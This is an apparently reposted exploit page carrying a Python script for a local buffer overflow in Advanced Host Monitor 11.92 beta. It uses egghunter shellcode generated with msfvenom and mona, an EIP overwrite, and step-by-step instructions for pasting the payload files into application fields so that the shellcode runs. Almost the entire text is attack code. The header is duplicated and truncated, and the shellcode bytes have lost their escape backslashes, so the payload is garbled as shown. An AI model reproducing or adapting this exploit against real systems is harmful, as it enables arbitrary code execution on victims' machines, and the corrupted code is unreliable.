Advanced Host Monitor 11.92 Beta Local Buffer Overflow

Details
Category: Vulnerabilities
Hits: 283
#!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Advanced Host Mo #!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-18 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Software Download #1: https://www.ks-soft.net/download/hm1192.exe #
# Software Download #2: https://www.ip-tools.biz/download/hm1192.exe #
# Version: 11.92 beta #
# The Program also has SEH Overflow, Which can be implemented in a similar way #
# Special Thanks to my wife #
# Steps : Open the APP --> Tools --> Trace (or Telnet) --> paste in contents from the egg.txt into "Host" --> Start --> Close #
# Advanced Host Monitor --> Options --> Startup --> paste in contents from the egghunter-winxp-win7.txt or #
# egghunter-win10.txt (depend on your windows version) into "load specific HTML file" --> Save --> Wait a litle --> #
# Shellcode (Calc) open #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#------------------------------------------------------------------------------------------------------------------------------------#

#--------------------------------------------------- EGG Shellcode Generation ---------------------------------------------------

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
egg = "w00tw00t"
egg += "x57x59x49x49x49x49x49x49x49x49x49x49x49"
egg += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
egg += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
egg += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
egg += "x79x6cx5ax48x4ex62x77x70x57x70x63x30x71"
egg += "x70x4bx39x5ax45x35x61x4fx30x52x44x4cx4b"
egg += "x52x70x46x50x6cx4bx53x62x54x4cx6cx4bx43"
egg += "x62x44x54x6cx4bx71x62x51x38x34x4fx6ex57"
egg += "x31x5ax36x46x55x61x6bx4fx4cx6cx37x4cx75"
egg += "x31x73x4cx45x52x54x6cx77x50x49x51x48x4f"
egg += "x34x4dx53x31x69x57x39x72x4ax52x62x72x43"
egg += "x67x6ex6bx71x42x52x30x4cx4bx70x4ax47x4c"
egg += "x6ex6bx62x6cx62x31x72x58x6ax43x70x48x33"
egg += "x31x4ex31x52x71x4cx4bx36x39x37x50x63x31"
egg += "x5ax73x4cx4bx42x69x52x38x68x63x57x4ax31"
egg += "x59x4ex6bx44x74x4cx4bx55x51x38x56x50x31"
egg += "x6bx4fx6ex4cx69x51x78x4fx46x6dx36x61x58"
egg += "x47x46x58x4bx50x52x55x39x66x65x53x71x6d"
egg += "x79x68x45x6bx31x6dx45x74x34x35x7ax44x52"
egg += "x78x4cx4bx62x78x77x54x47x71x58x53x75x36"
egg += "x6cx4bx34x4cx70x4bx6cx4bx52x78x35x4cx43"
egg += "x31x58x53x6cx4bx73x34x6ex6bx67x71x58x50"
egg += "x6cx49x73x74x45x74x55x74x63x6bx61x4bx33"
egg += "x51x32x79x51x4ax36x31x49x6fx4bx50x71x4f"
egg += "x71x4fx42x7ax6cx4bx44x52x48x6bx6ex6dx31"
egg += "x4dx50x6ax35x51x6ex6dx6fx75x48x32x55x50"
egg += "x75x50x53x30x46x30x55x38x74x71x4cx4bx72"
egg += "x4fx4ex67x69x6fx6bx65x4dx6bx5ax50x38x35"
egg += "x79x32x56x36x45x38x59x36x6ax35x6fx4dx6f"
egg += "x6dx69x6fx59x45x35x6cx64x46x31x6cx76x6a"
egg += "x4bx30x79x6bx4bx50x74x35x73x35x4dx6bx73"
egg += "x77x65x43x71x62x32x4fx50x6ax75x50x31x43"
egg += "x39x6fx5ax75x55x33x43x51x72x4cx45x33x44"
egg += "x6ex62x45x31x68x62x45x63x30x41x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

#----------------------------------------------- EGG Hunter Shellcode Generation ----------------------------------------------

#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "x4cx4cx4cx4cx5f"
egghunter += "x57x59x49x49x49x49x49x49x49x49x49x49"
egghunter += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
egghunter += "x50x30x41x35x41x6bx41x46x51x32x41x47"
egghunter += "x32x42x47x30x42x47x41x42x58x50x38x41"
egghunter += "x47x75x4ax49x70x66x4cx4cx78x4bx6bx30"
egghunter += "x49x6bx54x63x42x55x74x4ax66x51x69x4b"
egghunter += "x36x51x38x52x36x33x52x73x36x33x36x33"
egghunter += "x38x33x4fx30x71x76x4dx51x6bx7ax39x6f"
egghunter += "x66x6fx47x32x36x32x4dx50x59x6bx59x50"
egghunter += "x33x44x57x78x43x5ax66x62x72x78x78x4d"
egghunter += "x44x6ex73x6ax7ax4bx37x62x52x4ax71x36"
egghunter += "x61x48x55x61x69x59x6fx79x79x72x70x64"
egghunter += "x59x6fx75x43x73x6ax6ex63x57x4cx71x34"
egghunter += "x47x70x42x54x76x61x72x7ax57x4cx37x75"
egghunter += "x74x34x7ax76x6cx78x72x57x46x50x76x50"
egghunter += "x63x44x6dx59x59x47x4ex4fx71x65x4ex31"
egghunter += "x6ex4fx51x65x38x4ex79x6fx4bx57x41x41"

# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "x4cx4cx4cx4cx5f"
egghunter10 += "x57x59x49x49x49x49x49x49x49x49x49"
egghunter10 += "x49x49x49x49x49x49x49x37x51x5ax6a"
egghunter10 += "x41x58x50x30x41x35x41x6bx41x46x51"
egghunter10 += "x32x41x47x32x42x47x30x42x47x41x42"
egghunter10 += "x58x50x38x41x47x75x4ax49x4dx53x4a"
egghunter10 += "x4cx46x50x69x57x56x64x76x44x55x50"
egghunter10 += "x37x70x55x50x73x30x48x47x43x74x55"
egghunter10 += "x74x35x54x57x70x47x70x35x50x65x50"
egghunter10 += "x78x47x67x34x77x54x76x68x35x50x55"
egghunter10 += "x50x53x30x45x50x66x51x4ax72x61x76"
egghunter10 += "x4cx4cx58x4bx6fx70x6bx4bx61x33x50"
egghunter10 += "x75x63x32x4cx73x4fx30x70x66x4bx31"
egghunter10 += "x6ax6ax49x6fx64x4fx62x62x73x62x4d"
egghunter10 += "x50x69x6bx79x50x30x74x64x4bx53x58"
egghunter10 += "x6bx76x63x31x75x50x37x70x70x58x5a"
egghunter10 += "x6dx54x6ex52x7ax68x6bx67x61x30x31"
egghunter10 += "x49x4bx73x63x51x43x30x53x32x4ax71"
egghunter10 += "x39x63x68x38x33x49x50x51x74x69x6f"
egghunter10 += "x66x73x6dx53x7ax64x66x6cx42x7ax55"
egghunter10 += "x6cx47x75x71x64x49x44x78x38x72x57"
egghunter10 += "x66x50x74x70x31x64x4fx79x4bx67x4c"
egghunter10 += "x6fx70x75x78x4fx6ex4fx44x35x48x4c"
egghunter10 += "x6bx4fx68x67x41x41"

eip = "x4dx37x41"

buffer = egghunter + "x41" * (268 - len(egghunter)) + eip

f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "x41" * (268 - len(egghunter10)) + eip
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()